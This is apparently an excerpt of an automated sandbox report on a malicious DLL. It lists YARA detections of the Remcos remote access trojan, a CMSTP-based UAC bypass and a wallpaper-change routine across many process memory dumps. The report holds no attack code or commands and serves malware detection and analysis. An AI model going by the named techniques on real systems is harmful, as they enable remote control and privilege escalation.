              Source: Yara matchFile source: 20.2.rundll32.exe.3850000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.rundll32.exe.2a90000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.regsvr32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.rundll32.exe.2a40000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.rundll32.exe.520000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.rundll32.exe.2b40000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.4e10000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.regsvr32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.4e10000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.rundll32.exe.4240000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.rundll32.exe.2b40000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.rundll32.exe.8f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000018.00000002.2511293001.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2232792548.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.4190687497.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2230948357.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2183813294.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2229503398.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.2592748708.0000000002A90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2212028354.0000000005330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.2209122864.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2231320155.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.2210786919.0000000002C7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.2229090227.0000000000520000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.2593057749.000000000308A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2209821177.0000000005990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2595336178.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2593046305.0000000004240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2194973238.0000000002B40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2243597399.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2245664796.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.2210556963.00000000008F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2242971963.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2195089206.0000000002E9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2230248176.0000000004830000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2517552201.0000000003850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2521295751.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.2511207483.0000000002A40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.2229274510.0000000002B9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7496, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 7556, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7572, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7580, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7644, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7668, type: MEMORYSTR

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Contains functionalty to change the wallpaper
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02B1C9E2 SystemParametersInfoW,12_2_02B1C9E2
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 15_2_02A1C9E2 SystemParametersInfoW,15_2_02A1C9E2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 17.2.rundll32.exe.8f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 17.2.rundll32.exe.8f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 17.2.rundll32.exe.8f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 6.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 6.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 6.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 22.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 22.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 22.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 22.2.rundll32.exe.4240000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 22.2.rundll32.exe.4240000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 22.2.rundll32.exe.4240000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 6.2.rundll32.exe.5330000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 6.2.rundll32.exe.5330000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 6.2.rundll32.exe.5330000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 15.2.regsvr32.exe.2a00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 15.2.regsvr32.exe.2a00000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 15.2.regsvr32.exe.2a00000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0.2.loaddll32.exe.10ec85b6.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.loaddll32.exe.10ec85b6.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0.2.loaddll32.exe.10ec85b6.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 4.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 4.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 4.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 6.2.rundll32.exe.5330000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 6.2.rundll32.exe.5330000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 6.2.rundll32.exe.5330000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 3.2.regsvr32.exe.5990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 3.2.regsvr32.exe.5990000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 3.2.regsvr32.exe.5990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 20.2.rundll32.exe.3850000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 20.2.rundll32.exe.3850000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 20.2.rundll32.exe.3850000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 12.2.rundll32.exe.2b00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 12.2.rundll32.exe.2b00000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 12.2.rundll32.exe.2b00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 20.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 20.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 20.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 5.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 5.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 5.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 24.2.rundll32.exe.2a40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 24.2.rundll32.exe.2a40000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 7.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 4.2.rundll32.exe.4df0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 4.2.rundll32.exe.4df0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 4.2.rundll32.exe.4df0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 7.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 7.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 6.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 22.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 7.2.rundll32.exe.4830000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 3.2.regsvr32.exe.5990000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 22.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 7.2.rundll32.exe.4830000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 24.2.rundll32.exe.2a40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 15.2.regsvr32.exe.2a00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 15.2.regsvr32.exe.2a00000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 12.2.rundll32.exe.2b00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 3.2.regsvr32.exe.5990000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 6.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 18.2.rundll32.exe.520000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 6.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 22.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 12.2.rundll32.exe.2b00000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 3.2.regsvr32.exe.5990000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 18.2.rundll32.exe.520000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 7.2.rundll32.exe.4830000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 15.2.regsvr32.exe.2a00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 5.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 12.2.rundll32.exe.2b00000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 18.2.rundll32.exe.520000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 5.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 5.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 20.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 20.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 7.2.rundll32.exe.4830000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 20.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 7.2.rundll32.exe.4830000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 7.2.rundll32.exe.4830000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 4.2.rundll32.exe.4df0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 4.2.rundll32.exe.4df0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 4.2.rundll32.exe.4df0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0.2.loaddll32.exe.10ec85b6.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.loaddll32.exe.10ec85b6.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0.2.loaddll32.exe.10ec85b6.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 20.2.rundll32.exe.3850000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 20.2.rundll32.exe.3850000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 20.2.rundll32.exe.3850000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 25.2.rundll32.exe.2a90000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 25.2.rundll32.exe.2a90000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 25.2.rundll32.exe.2a90000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 3.2.regsvr32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 3.2.regsvr32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 3.2.regsvr32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 24.2.rundll32.exe.2a40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 24.2.rundll32.exe.2a40000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 24.2.rundll32.exe.2a40000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 4.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 4.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 4.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 18.2.rundll32.exe.520000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 18.2.rundll32.exe.520000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 18.2.rundll32.exe.520000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 14.2.rundll32.exe.2b40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 14.2.rundll32.exe.2b40000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 14.2.rundll32.exe.2b40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 5.2.rundll32.exe.4e10000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 5.2.rundll32.exe.4e10000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 5.2.rundll32.exe.4e10000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 3.2.regsvr32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 3.2.regsvr32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 3.2.regsvr32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 25.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 25.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 25.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 5.2.rundll32.exe.4e10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 5.2.rundll32.exe.4e10000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 5.2.rundll32.exe.4e10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 22.2.rundll32.exe.4240000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 22.2.rundll32.exe.4240000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 22.2.rundll32.exe.4240000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 14.2.rundll32.exe.2b40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 14.2.rundll32.exe.2b40000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 14.2.rundll32.exe.2b40000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 7.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 7.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 7.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 17.2.rundll32.exe.8f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 17.2.rundll32.exe.8f0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 17.2.rundll32.exe.8f0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000003.00000002.2232792548.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000004.00000002.2230948357.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000004.00000002.2183813294.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000004.00000002.2183813294.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000004.00000002.2183813294.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000005.00000002.2229503398.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000005.00000002.2229503398.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000005.00000002.2229503398.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000019.00000002.2592748708.0000000002A90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000019.00000002.2592748708.0000000002A90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000019.00000002.2592748708.0000000002A90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000006.00000002.2212028354.0000000005330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
